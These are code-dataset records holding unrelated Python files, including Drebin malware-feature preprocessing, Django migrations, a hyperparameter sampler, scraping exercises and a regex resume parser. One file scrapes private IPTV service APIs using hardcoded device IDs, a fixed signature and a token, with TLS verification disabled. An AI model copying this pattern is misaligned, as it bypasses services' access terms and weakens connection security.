line.strip().split(\"::\")\n '''if info[0] == \"feature\":\n if \"req_hw\" in file_dict:\n file_dict[info[0]+\"req_hw\"+info[1]] = True;\n else:\n file_dict[\"req_hw\"] = [info[1]]\n elif info[0] == \"permission\":\n if \"req_perm\" in file_dict:\n file_dict[\"req_perm\"].append(info[1])\n else:\n file_dict[\"req_perm\"] = [info[1]]\n elif (info[0] == \"activity\"\n or info[0] == \"service_receiver\"\n or info[0] == \"provider\"\n or info[0] == \"service\"):\n if \"app_comp\" in file_dict:\n file_dict[\"app_comp\"].append(info[1])\n else:\n file_dict[\"app_comp\"] = [info[1]]\n elif info[0] == \"intent\":\n if \"filt_int\" in file_dict:\n file_dict[\"filt_int\"].append(info[1])\n else:\n file_dict[\"filt_int\"] = [info[1]]\n elif info[0] == \"api_call\":\n if \"rstr_api\" in file_dict:\n file_dict[\"rstr_api\"].append(info[1])\n else:\n file_dict[\"rstr_api\"] = [info[1]]\n elif info[0] == \"real_permission\":\n if \"use_perm\" in file_dict:\n file_dict[\"use_perm\"].append(info[1])\n else:\n file_dict[\"use_perm\"] = [info[1]]\n elif info[0] == \"call\":\n if \"susp_api\" in file_dict:\n file_dict[\"susp_api\"].append(info[1])\n else:\n file_dict[\"susp_api\"] = [info[1]]\n elif info[0] == \"url\":\n if \"use_urls\" in file_dict:\n file_dict[\"use_urls\"].append(info[1])\n else:\n file_dict[\"use_urls\"] = [info[1]]\n '''\n return file_dict\n\ndata, hash = load_dataset(\"C:\\\\Users\\\\Valerio\\\\Downloads\\\\Machine Learning\\\\HW\\\\drebin\\\\feature_vectors\")\nfrom sklearn.feature_extraction import DictVectorizer\nvec = DictVectorizer()\n\nprint(vec.fit_transform(data))\nprint(hash)\n","sub_path":"mandroid/dataset_preprocessing.py","file_name":"dataset_preprocessing.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"309531288","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom builtins import open\nfrom builtins import str\n\nfrom future import standard_library\nstandard_library.install_aliases()\n\n__all__ = [\n 'prepare_input_files_directory'\n]\n\nimport filecmp\nimport os\nimport shutil\n\nfrom pathlib2 import Path\n\nfrom ..utils.exceptions import OasisException\nfrom ..utils.path import as_path\n\n\ndef prepare_input_files_directory(\n target_dir,\n exposure_fp,\n exposure_profile_fp=None,\n keys_fp=None,\n lookup_config_fp=None,\n model_version_fp=None,\n accounts_fp=None,\n accounts_profile_fp=None,\n fm_aggregation_profile_fp=None,\n ri_info_fp=None,\n ri_scope_fp=None\n):\n try:\n # Prepare the target directory and copy the source files, profiles and\n # model version file into it\n target_dir = as_path(target_dir, 'target Oasis files directory', is_dir=True, preexists=False)\n if not os.path.exists(target_dir):\n Path(target_dir).mkdir(parents=True, exist_ok=True)\n\n paths = [p for p in (\n exposure_fp, exposure_profile_fp, accounts_fp, accounts_profile_fp,\n fm_aggregation_profile_fp, lookup_config_fp, model_version_fp,\n keys_fp, ri_info_fp, ri_scope_fp\n )\n if p\n ]\n for src in paths:\n if src and os.path.exists(src):\n dst = os.path.join(target_dir, os.path.basename(src))\n shutil.copy2(src, target_dir) if not (os.path.exists(dst) and filecmp.cmp(src, dst, shallow=False)) else None\n except (FileNotFoundError, IOError, OSError, shutil.Error, TypeError, ValueError) as e:\n raise OasisException(e)\n\n return target_dir\n","sub_path":"oasislmf/model_preparation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386184839","text":"#!/usr/bin/env python3\n\n#https://codeforces.com/problemset/problem/766/B\n\ndef maket(l):\n l.sort()\n for i in range(len(l)-2): #not limit to 4 case\n if l[i]+l[i+1]>l[i+2]:\n return 'YES'\n return 'NO'\n\n_ = input()\nl = list(map(int,input().split()))\nprint(maket(l))\n","sub_path":"codeforces/geometry计算几何/1000/766B搭三角形.py","file_name":"766B搭三角形.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"649672266","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('password', models.CharField(verbose_name='password', max_length=128)),\n ('last_login', models.DateTimeField(null=True, verbose_name='last login', blank=True)),\n ('is_superuser', models.BooleanField(verbose_name='superuser status', default=False, help_text='Designates that this user has all permissions without explicitly assigning them.')),\n ('email', models.TextField(db_index=True, unique=True)),\n ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.')),\n ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.')),\n ('created_at', models.DateTimeField(default=datetime.datetime.now)),\n ('groups', models.ManyToManyField(blank=True, related_name='user_set', help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', verbose_name='groups', related_query_name='user', to='auth.Group')),\n ('user_permissions', models.ManyToManyField(blank=True, related_name='user_set', help_text='Specific permissions for this user.', verbose_name='user permissions', related_query_name='user', to='auth.Permission')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Proposal',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('abstract', models.TextField()),\n ('title', models.TextField()),\n ('created_at', models.DateTimeField(default=datetime.datetime.now)),\n ],\n ),\n migrations.CreateModel(\n name='Vote',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('created_at', models.DateTimeField(default=datetime.datetime.now)),\n ('is_interested', models.BooleanField(default=True)),\n ('proposal', models.ForeignKey(to='voting.Proposal')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","sub_path":"voting/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"341844578","text":"# -*- encoding=utf-8 -*-\nimport time, requests, json\n\n\nclass bobotv():\n\n def __init__(self,urls,headers,paras):\n self.urls=urls\n self.headers=headers\n self.paras=paras\n\n def search(self,kw,type):\n para=self.paras['search']\n para['Title']=kw\n para['Type']=type\n req=requests.get(self.urls['search'],params=para,headers=self.headers['search'])\n #req.encoding = 'json'\n c=json.loads(req.text)\n return self.prase(c)\n\n def prase(self,content):\n\n res = {}\n for item in content['searchlist']:\n code = item['code']\n title = item['title']\n leixin = item['mainFolder']\n actors = item['actors']\n year = item['year']\n datalink = item['dataLink']\n\n res[code] = [title, actors,leixin,year, datalink]\n return res\n\n\n def update_head(self):\n req = requests.get(self.urls['head'], params=self.paras['head'], headers=self.headers['head'])\n content = json.loads(req.text)\n res = ''\n\n for item in content['areaDatas'][1]['items']:\n text = ''.join([time.strftime('%Y-%m-%d'), u'~播播TV~', item['itemTitle'],item['itemSubTitle']])\n res += text + '\\n'\n return res\n\n def update_video(self,url):\n\n req = requests.get(url, headers=self.headers['play'])\n content = json.loads(req.text)\n\n if content.get('episodes'):\n text = ''.join([time.strftime('%Y-%m-%d'), u'~播播TV~',str(len(content['episodes'])), '~', content['series']['episodenum']])\n else:\n text = ''.join([time.strftime('%Y-%m-%d'), u'~播播TV~',content['albumitem'][0]['title']])\n return text\n\n\nclass bestv():\n import uuid\n\n def __init__(self,urls,headers,paras):\n self.urls=urls\n self.headers=headers\n self.paras=paras\n\n def search(self,kw):\n para=self.paras['search']\n para['k']=kw\n req=requests.get(self.urls['search'],params=para,headers=self.headers['search'])\n c=json.loads(req.text)\n\n status=c['code']\n\n return self.prase(status,c)\n\n def prase(self,status,content):\n\n res = {}\n if status == 0:\n for item in content['dataMap']['result']:\n code = item['code']\n vid = item['id']\n title = item['title']\n typ = item['cateName']\n actors = item['actors']\n year = item['pubdate']\n fdncode = item['fdncode']\n\n res[code] = [title,actors,typ, year, vid, fdncode]\n return res\n elif status=='':\n return 'invaild token'\n\n\n def update_head(self):\n req = requests.get(self.urls['head'], params=self.paras['head'], headers=self.headers['head'])\n content = json.loads(req.text)\n res = ''\n for item in content['data']['banner']:\n text = ''.join([time.strftime('%Y-%m-%d'),u'~百视通~', item['title']])\n res += text + '\\n'\n return res\n\n def update_video(self,vid):\n para = self.paras['play']\n para['vid'] = vid\n if len(vid)>5:\n req = requests.get(self.urls['play'], params=para, headers=self.headers['play'])\n content = json.loads(req.text)\n text = ''.join([time.strftime('%Y-%m-%d'), u'~百视通~',str(content['data']['epCnt']), '~', str(content['data']['epTotal'])])\n else:\n url='https://bestvapi.bestv.cn/api/program_list?app=default&cid=%s&p=1&len=20'%vid\n req = requests.get(url, headers=self.headers['play'])\n content = json.loads(req.text)\n last=content['list'][0]\n text = ''.join([time.strftime('%Y-%m-%d'), u'~百视通~',last['title']])\n\n return text\n\n\n def update_token(self):\n\n para={'anm':'BesTV',\n 'app':'ios',\n 'bn':'Apple',\n 'channelid':'cd151695-a8cb-408d-a1b0-ab61556ce5a5',\n 'os':'ios11.4',\n 'rs':'640x1136',\n 'ut':'idfa',\n 'idfa':'30FF8D7D-B625-4803-AA06-432DE9E9EABC',\n 'net':'wifi',\n 'mnc':'00',\n 'pnm':'com.bestv.app.BesTV',\n 'lt':'1',\n 'lct':'31.174850,121.406448',\n 'timestamp':'1533784274',\n 'ua':'Mozilla/5.0(iPhone;CPUiPhoneOS11_3likeMacOSX)AppleWebKit/605.1.15(KHTML,likeGecko)Mobile/15E216',\n 'signature':'1403bfc4a49e8d1028558a0c742874db9e9ee492a5a9c3d5996ba98bc1e91605',}\n\n # post_url='https://bestvapi.bestv.cn/app/init?anm=BesTV&app=ios&bn=Apple&channelid=cd151695-a8cb-408d-a1b0-ab61556ce5a5&idfa=31AED55C-9969-41DC-ADA7-2CDE39BEF190&lct=31.174850,121.406448<=1&mn=iPhone6,1&mnc=00&net=wifi&os=ios11.4&pnm=com.bestv.app.BesTV&rs=640x1136&ua=Mozilla/5.0(iPhone;CPUiPhoneOS11_3likeMacOSX)AppleWebKit/605.1.15(KHTML,likeGecko)Mobile/15E216&ut=idfa&signature=8b5002403baed5e5439b5bed93ff1c04f2c8407d525b643b348be2c5ae248092'\n # post_url='https://bestvapi.bestv.cn/app/refresh?anm=BesTV&app=ios&bn=Apple&channelid=cd151695-a8cb-408d-a1b0-ab61556ce5a5&idfa=30FF8D7D-B625-4803-AA06-432DE9E9EABC&lct=31.174850,121.406448<=1&mn=iPhone6,1&mnc=00&net=wifi&os=ios11.4&pnm=com.bestv.app.BesTV&rs=640x1136×tamp=1533783029&ua=Mozilla/5.0(iPhone;CPUiPhoneOS11_3likeMacOSX)AppleWebKit/605.1.15(KHTML,likeGecko)Mobile/15E216&ut=idfa&signature=bb2718a21e9021fe4c2bfe59692aa039f0e9a073fc531f912aecc66d661c7200'\n post_url = 'https://bestvapi.bestv.cn/app/init?'\n para['timestamp']=str(int(time.time()))\n para['signature']='1403bfc4a49e8d1028558a0c742874db9e9ee492a5a9c3d5996ba98bc1e91605'\n\n print(para['signature'])\n data={\"device_id\":\"iPhone6,1_0_30FF8D7D-B625-4803-AA06-432DE9E9EABC\"}\n resp=requests.post(post_url,headers=self.headers['head'],params=para,data=data)\n content = json.loads(resp.text)\n return content\n\n\nclass iQIYI():\n\n def __init__(self, urls, headers, paras):\n self.urls = urls\n self.headers = headers\n self.paras = paras\n\n def search(self, kw):\n para = self.paras['search']\n para['keyword'] = kw\n\n req = requests.get(self.urls['search'], params=para, headers=self.headers['search'])\n c = json.loads(req.text)\n\n return self.prase(c)\n\n def prase(self, content):\n res = {}\n for item in content['cards']:\n cate={'tv_album':u'电视剧','film':u'电影','variety_show_album':u'综艺'}\n if item['name'] in cate:\n source = item['items'][0]['click_event']['statistics']['siteId']\n if source=='iqiyi':\n code = item['items'][0]['_id']\n title = item['items'][0]['meta'][0]['text'].replace('<','').replace('>','')\n try:actor = item['items'][0]['meta'][2]['text']\n except:actor=''\n category=cate[item['name']]\n #year=item['items'][0]['meta'][1]['text']\n vip = item['items'][0]['click_event']['data']['load_img']\n\n res[code] = [title, actor, category, vip,]\n\n return res\n\n\nclass iTV():\n\n def __init__(self,urls,headers,paras):\n self.urls=urls\n self.headers=headers\n self.paras=paras\n\n def search(self,kw):\n para=self.paras['search']\n para['title']=kw\n req=requests.get(self.urls['search'],params=para,headers=self.headers['search'])\n if req.text!='invalid token !':\n c=json.loads(req.text)\n return self.prase(c)\n else:\n print(req.text)\n new_host=self.update_token()[0]\n new_token=self.update_token()[1]\n\n self.urls['search']='http://'+new_host+'/epgs/yoongoo/media/search?'\n self.paras['search']['token']=new_token\n return self.search(kw)\n\n def prase(self,content):\n res = {}\n for item in content['list']:\n columnId = item['columnId']\n columns={2:u'电影',3:u'电视剧',4:u'综艺'}\n cate =columns.get(columnId) or item['category']\n if item.get('copyright'):\n copyright = item['copyright']\n if 'phone' in copyright:\n code = item['id']\n title = item['title']\n actor = item['actor']\n vip = item['isPay']\n totalSerial = item['totalSerial']\n\n res[code] = [title, actor, cate,columnId,code,vip, copyright, totalSerial]\n return res\n\n\n\n def update_head(self):\n req = requests.get(self.urls['head'], params=self.paras['head'], headers=self.headers['head'])\n content = json.loads(req.text)\n res = ''\n\n for item in content[0]['rcmb'][0]['items']:\n title=item.get('tVTitle')\n if not title:\n title=item.get('title','error')\n text = ''.join([time.strftime('%Y-%m-%d'),u'~安徽iTV~', title])\n res += text + '\\n'\n\n return res\n\n def update_video(self,vid,typeid):\n para = self.paras['play']\n para['id'] = vid\n para['columnid']=typeid\n\n req = requests.get(self.urls['play'], params=para, headers=self.headers['play'])\n content = json.loads(req.text)\n text=''\n if typeid=='3':\n text = ''.join([time.strftime('%Y-%m-%d'), u'~安徽iTV~' ,str(content['totalcount']), '~', str(content['totalSerial'])])\n elif typeid == '4':\n text = ''.join([time.strftime('%Y-%m-%d'), u'~安徽iTV~', content['urls'][-1]['title'], '~', str(content['totalcount'])])\n else:\n pass\n\n return text\n\n def update_token(self):\n\n post_header = {'User-Agent': 'BrightenVideo/1805150936 CFNetwork/897.15 Darwin/17.5.0',\n 'Host': '117.71.39.12:5001',\n 'Accept-Language': 'zh',\n 'Accept-Encoding': 'br, gzip, deflate',\n 'Content-Length': '574',\n 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',\n 'Connection': 'keep-alive',\n 'Accept': '*/*', }\n post_url = 'https://117.71.39.12:5001/ois/user/login'\n XML = ''''''\n\n resp = requests.post(post_url, headers=post_header, data=XML, verify=False)\n\n return resp.headers['EPGS-Token']\n\n\nclass UHD():\n\n def __init__(self,urls,headers,paras):\n self.urls=urls\n self.headers=headers\n self.paras=paras\n\n def search(self,kw):\n para=self.paras['search']\n para['title']=kw\n req=requests.get(self.urls['search'],params=para,headers=self.headers['search'])\n\n if req.text!='invalid token !':\n c=json.loads(req.text)\n return self.prase(c)\n else:\n print(req.text)\n new_host=self.update_token()[0]\n new_token=self.update_token()[1]\n\n self.urls['search']='http://'+new_host+'/epgs/UHD/media/get?'\n self.paras['search']['token']=new_token\n return self.search(kw)\n\n def prase(self,content):\n res = {}\n for item in content['list']:\n columnId = item['columnId']\n columns = {2: u'电影', 3: u'电视剧', 4: u'综艺'}\n # if columnId in columns:\n cate = columns.get(columnId) or item['category']\n copyright = item['copyright']\n code = item['id']\n title = item['title']\n actor = item['actor']\n vip = item['isPay']\n totalSerial = item['totalSerial']\n categoryList=item.get('categoryList')\n if categoryList:\n categoryID=categoryList[0]['id']\n else:\n categoryID='null'\n\n res[code] = [title, actor, cate,columnId, code,vip, copyright, totalSerial,categoryID]\n return res\n\n\n\n def update_head(self):\n req = requests.get(self.urls['head'], params=self.paras['head'], headers=self.headers['head'])\n content = json.loads(req.text)\n res = ''\n\n for item in content['0'][1]['rcmbItems']:\n text = ''.join([time.strftime('%Y-%m-%d'),u'~新疆UHD~', item['title'],item['subtitle']])\n res += text + '\\n'\n\n return res\n\n def update_video(self,vid,typeid):\n para = self.paras['play']\n para['id'] = vid\n para['columnid']=typeid\n if typeid=='3':\n req = requests.get(self.urls['play'], params=para, headers=self.headers['play'])\n req.encoding = 'utf-8'\n content = json.loads(req.text)\n text = ''.join([time.strftime('%Y-%m-%d'), u'新疆~UHD~' ,str(content['curSerial']), '~', str(content['totalSerial'])])\n else:\n url='http://202.107.188.243:8080/epgs/UHD/media/get?columnid=%s&pageindex=0&pagesize=48&lang=zh&token=guoziyun&category=%s&sort=sort'%(typeid,vid)\n req = requests.get(url, headers=self.headers['play'])\n req.encoding = 'utf-8'\n content = json.loads(req.text)\n text = ''.join([time.strftime('%Y-%m-%d'), u'~新疆UHD~', content['list'][0]['title']])\n\n return text\n\n def update_token(self):\n\n post_header = {'User-Agent': 'BrightenVideo/1805102147 CFNetwork/901.1 Darwin/17.6.0',\n 'Host': '202.107.188.228:5001',\n 'Accept-Language': 'zh-cn',\n 'Accept-Encoding': 'br, gzip, deflate',\n 'Content-Length': '612',\n 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',\n 'Connection': 'keep-alive',\n 'Accept': '*/*', }\n\n post_url = 'https://202.107.188.228:5001/ois/user/login'\n\n XML = ''''''\n\n resp = requests.post(post_url, headers=post_header, data=XML, verify=False)\n\n host=resp.headers['EPGS']\n token=resp.headers['EPGS-Token']\n\n return (host,token)\n\n\nclass HuNan_TV():\n import uuid\n def __init__(self, urls, headers, paras):\n self.urls = urls\n self.headers = headers\n self.paras = paras\n\n def search(self, kw,cate):\n category={'电视剧':'T_C81E728','电影':'T_C4CA423','综艺':'T_ECCBC87'}\n para = self.paras['search']\n para['words'] = kw\n\n para['timestamp']=str(int(time.time()))\n para['token']=str(self.uuid.uuid4()).replace('-','')\n req = requests.post(self.urls['search'], params=para, headers=self.headers['search'])\n c = json.loads(req.text)\n dict1 = self.prase(c)\n\n time.sleep(2)\n\n para['typeCode']=category.get(cate)\n if para['typeCode']:\n req=requests.post(self.urls['search'], params=para, headers=self.headers['search'])\n c = json.loads(req.text)\n dict2 = self.prase(c)\n\n return dict(dict1.items()+dict2.items())\n return dict1\n\n def prase(self, content):\n res = {}\n if content.get('Data'):\n for item in content['Data']:\n copyright=item['JumpData']['isThrow']\n if copyright==0:\n code = item['JumpData']['assetId']\n title = item['JumpData']['clipName']\n actor = item['JumpData']['director'] #leader 8月字段错乱,演员在director字段下,本来应在leader下\n category=item['JumpData']['typeName']\n year=item['JumpData']['year']\n left=item['TagInfo'].get('leftTag')\n right=item['TagInfo'].get('rightTag')\n\n res[code] = [title, actor, category, year,left,right,code]#vip, curSerial,playID]\n return res\n\n def update_head(self):\n timestamp=str(int(time.time()))\n token=str(self.uuid.uuid4()).replace('-', '')\n u0='http://api2.iptv.leso114.com:8080/api3/layout/getTemplateByLayoutCode?key=bLdNEYOkt7Ke8zb%252FE%252FU6ZfPqOQB2lPjTaG7THNx8WiyNFyd6X0a%252FLOgnnPmTuCxLw0J0EOggdScKyPFhyuNCXJAvXt2ZgYDJYPMYvGj8SohJfWVgSzwz%252FLeBjZRkQCKd1tiIyN19yr%252FSzFndzXT5yW27fNUYeH3KicvsWmWCEBw%253D&layoutCode=iptvHome×tamp='+timestamp+'&token='+token\n req0 = requests.post(u0, headers=self.headers['head'])\n c=json.loads(req0.text)\n\n para=self.paras['head']\n para['templateCode']=c['Data'][0]['templateCode']\n para['timestamp'] = timestamp\n para['token'] = str(self.uuid.uuid4()).replace('-', '')\n req = requests.post(self.urls['head'], params=para, headers=self.headers['head'])\n content = json.loads(req.text)\n res = ''\n for item in content['Data']:\n\n text = ''.join([time.strftime('%Y-%m-%d'),u'~湖南IPTV~', item['DisInfo']['title'],item['DisInfo']['subTitle']])\n res += text + '\\n'\n\n return res\n\n def update_video(self, assid):\n para = self.paras['play']\n para['assetId'] = assid\n para['timestamp'] = str(int(time.time()))\n para['token'] = str(self.uuid.uuid4()).replace('-', '')\n\n req = requests.get(self.urls['play'], params=para, headers=self.headers['play'])\n\n content = json.loads(req.text)\n last=content['Data'][0]['JumpData']['PartList'][-1]\n first=content['Data'][0]['JumpData']['PartList'][0]\n\n text = ''.join([time.strftime('%Y-%m-%d'), u'~湖南IPTV~', last['partName'],'@',str(last['serialNum']),'|',first['partName'],'@',str(first['serialNum'])])\n\n return text\n\n\n__all__ = ['bobotv', 'bestv']\n'''\nif __name__ == '__main__':\n best = bestv(paras.urls_bestv, paras.headers_bestv, paras.paras_bestv)\n print(best.update_token())\n'''","sub_path":"Proj_App/VideoSite/video_APP.py","file_name":"video_APP.py","file_ext":"py","file_size_in_byte":18946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96271327","text":"\"\"\"\nDefine the domain space abstractions for the Optimizer\n\"\"\"\n\n# this is used to check whether the domain space object is a of type rv_frozen.\n# if the parameter type is a disribution or rv_frozen, the parameter sampler can handle it\nfrom scipy.stats._distn_infrastructure import rv_frozen\nimport numpy as np\nfrom sklearn.model_selection import ParameterSampler\n\n\n\n\nclass domain_space():\n\n \"\"\"\n initializer\n 1) We expect a parameter dictionary as an input from which we will creating a mapping.\n 2) The mapping is storing the categorical variables or discrete variables along with the discrete possible values\n 3) The categorical variables are handeled as one hot encoding values\n \"\"\"\n def __init__(self,\n param_dict,\n domain_size):\n self.param_dict = param_dict\n\n #creating a mapping of categorical variables\n self.create_mappings()\n\n #print('mapping_categorical')\n #print(self.mapping_categorical)\n\n #print('mapping_int')\n #print(self.mapping_int)\n\n #the domain size to explore using the parameter sampler\n self.domain_size = domain_size\n\n\n \"\"\"\n returns the list of domain values using the parameter sampler\n The size of values is the domain_size\n \"\"\"\n def get_domain(self):\n domain_list = list(ParameterSampler(self.param_dict, n_iter=self.domain_size))\n return domain_list\n\n \"\"\"\n return a random sample using the ParameterSample\n \"\"\"\n def get_random_sample(self,size):\n domain_list = list(ParameterSampler(self.param_dict, n_iter=size))\n return domain_list\n\n \"\"\"\n Categorical values/discrete values are considered from the list of each value being str\n\n We will finally do one-hot-encoding of the list values.\n Here we will keep some book-keeping information, like number of different values\n and the mapping of each\n\n Integer values are considered from list of each value as int or from a range\n \"\"\"\n def create_mappings(self):\n mapping_categorical = dict()\n mapping_int = dict()\n\n param_dict = self.param_dict\n for par in param_dict:\n if isinstance(param_dict[par], rv_frozen):\n pass # we are not doing anything at present, and will directly use its value for GP.\n\n elif isinstance(param_dict[par],range):\n mapping_int[par] = param_dict[par]\n\n elif isinstance(param_dict[par],list):\n\n #for list with values of string, we are considering categorical or discrete\n if all(isinstance(x, str) for x in param_dict[par]):\n mapping_categorical[par] = param_dict[par]\n\n #for list with all int, we are considering it as a int\n elif all(isinstance(x, int) for x in param_dict[par]):\n mapping_int[par] = param_dict[par]\n\n self.mapping_categorical = mapping_categorical\n self.mapping_int = mapping_int\n\n\n\n \"\"\"\n convert the hyperparameters from the param_dict space to the GP space, by converting the\n categorical variables to one hotencoded, and return a numpy array which can be used to train the GP\n\n input is the domain_list generated using the Parameter Sampler.\n \"\"\"\n def convert_GP_space(self,\n domain_list):\n mapping_categorical = self.mapping_categorical\n\n X =[]\n for domain in domain_list:\n curr_x = []\n #for x in domain:\n for x in sorted (domain.keys()):\n #this value can be directly used, for int too, we will consider it as a float for GP\n if x not in mapping_categorical:\n curr_x.append(domain[x])\n\n #this is a categorical variable which require special handling\n elif x in mapping_categorical:\n\n size = len(mapping_categorical[x]) # total number of categories.\n\n # we need to see the index where: domain[x] appears in mapping[x]\n index = mapping_categorical[x].index(domain[x])\n\n listofzeros = [0.0] * size\n\n\n # We will set the value to one for one hot encoding\n listofzeros[index] = 1.0\n\n #expanding current list\n curr_x = curr_x + listofzeros\n\n X.append(curr_x)\n\n X = np.array(X)\n\n return X\n\n\n \"\"\"\n Convert from the X_gp space which is a numpy array that can be given input to the gaussian process\n to the parameter sampler space which is a list of the dict\n\n We have to reverse the one-hotencoded transformation of the categories to the category name\n \"\"\"\n def convert_PS_space(self,\n X_gp):\n X_ps = []\n\n mapping_categorical = self.mapping_categorical\n mapping_int = self.mapping_int\n param_dict = self.param_dict\n\n\n for i in range(X_gp.shape[0]):\n\n curr_x_gp = X_gp[i]\n #we will create a list of dict, same as parameter samplers\n curr_x_ps = dict()\n\n\n index = 0\n\n #every sample is from the param_dict\n\n for par in sorted (param_dict.keys()):\n #for par in param_dict:\n #print('par is:',par)\n\n #this has to have integer values\n if par in mapping_int:\n curr_x_ps[par] = int(curr_x_gp[index])\n index = index+1\n\n #this par is a categorical variable and we need to handle it carefully\n elif par in mapping_categorical:\n size = len(mapping_categorical[par]) # total number of categories.\n\n one_hot_encoded = curr_x_gp[index:index+size]\n category_type = np.argmax(one_hot_encoded)\n\n category_type = mapping_categorical[par][category_type]\n\n curr_x_ps[par] = category_type\n\n # we have processed the entire one-hotencoded\n index = index+size\n\n #this is a float value\n else:\n curr_x_ps[par] = curr_x_gp[index]\n index = index+1\n\n X_ps.append(curr_x_ps)\n\n return X_ps\n","sub_path":"mango/domain/domain_space.py","file_name":"domain_space.py","file_ext":"py","file_size_in_byte":6304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"653544762","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.main),\n path(\"main\", views.main),\n path(\"register_user\", views.register_user),\n path(\"login_user\", views.login_user),\n path(\"travels\", views.show_trips),\n path(\"travels/join/\", views.join_trip),\n path(\"travels/destination/\", views.show_destination),\n path(\"travels/add\", views.add_trip),\n path(\"logout\", views.logout)\n]","sub_path":"apps/travel_plans/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"542493780","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen, Request\n\nreq = Request(\"https://realpython.com/practice/profiles.html\", headers={\"User-Agent\": \"Mozilla/5.0\"})\nhtml_page = urlopen(req)\nhtml_text = html_page.read().decode('utf-8')\nmy_soup = BeautifulSoup(html_text, features=\"html.parser\")\n\nfor tag in my_soup.find_all(\"a\"):\n url = \"https://realpython.com/practice/\" + tag['href']\n req = Request(url, headers={\"User-Agent\":\"Mozilla/5.0\"})\n html_page = urlopen(req)\n html_text = html_page.read().decode('utf-8')\n my_soup = BeautifulSoup(html_text, features=\"html.parser\")\n print(my_soup.get_text())","sub_path":"part6/BS_review.py","file_name":"BS_review.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"307661130","text":"##\n## Imprima la cantidad de registros por letra para la \n## primera columna, ordenados alfabeticamente.\n##\n## A,8\n## B,7\n## C,5\n## D,6\n## E,14\n##\ntxt = open('data.csv','r').readlines()\ntxt = [row[0:-1]for row in txt]\ntxt = [line.replace('\\t','')for line in txt]\nc = sorted(set([row[0]for row in txt]))\ns = [row[0]for row in txt]\naa =0\nfor i in c:\n aa = s.count(i)\n print(i+','+str(aa))\n \n","sub_path":"q02.py","file_name":"q02.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569613316","text":"import re\r\nEOF = ''\r\n# Read the file as a text\r\n\r\nf = open(r\"C:\\Users\\Purushotham\\Desktop\\oracle\\day_05\\regex_ex\\resume.txt\", \"r\")\r\ncontent = f.read()\r\nf.close()\r\n# Patterns\r\n\r\njobid = r'#\\d{6}'\r\nemail = r\"(\\w+[.-_]){,3}\\w+@\\w+\\.(com|org|in)\" # raj.kumar.avss.009@gmail.com, raj.kumar.009#gmail, raj.kumar@gmail.com, raj@gmail.com\r\nphone = r\"\\d{3}-?\\d{3}-?\\d{4}\"\r\nlinkedin = r\"(linkedin.com)/\\w+/(\\w+[-_.]){,5}\\w+\"\r\nname = r\"(Sincerely,?)\\n+(?P\\w+\\s\\w+)\"\r\n\r\nipaddr = r\"([0-9]{1,3}\\.){3}[0-9]{1,3}\" # Deepika\r\nexperience = r\"(?P[0-9]{,2}\\+\\s(years?|months?))[\\w\\s]*(experience)\"\r\n\r\n# Apply the patterns and store what ever is extracted\r\n\r\n\r\n\r\nm = re.search(jobid, content)\r\nif m:\r\n print('JOBID : ', m.group())\r\n\r\nm = re.search(email, content)\r\nif m:\r\n print('EMAIL : ', m.group())\r\n\r\nm = re.search(phone, content)\r\nif m:\r\n print('PHONE : ', m.group())\r\n\r\nm = re.search(linkedin, content)\r\nif m:\r\n print('LINKEDIN : ', m.group())\r\n\r\nm = re.search(name, content)\r\nif m:\r\n print('NAME : ', m.groupdict()['Name'])\r\n\r\nm = re.search(experience, content)\r\nif m:\r\n print('EXPERIENCE : ', m.groupdict()['experience'])\r\n\r\nm = re.search(ipaddr, content)\r\nif m:\r\n print('IP ADDRESS : ', m.group())","sub_path":"day_04/regex_ex/extract_details.py","file_name":"extract_details.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"256692159","text":"# -*- coding: utf-8 -*-\nimport socket, time, struct, random\n\nINVALIDE_ID = 0\n\n#type 任务类型 render_task_type.tasktype_houdini_proj\n#Priority 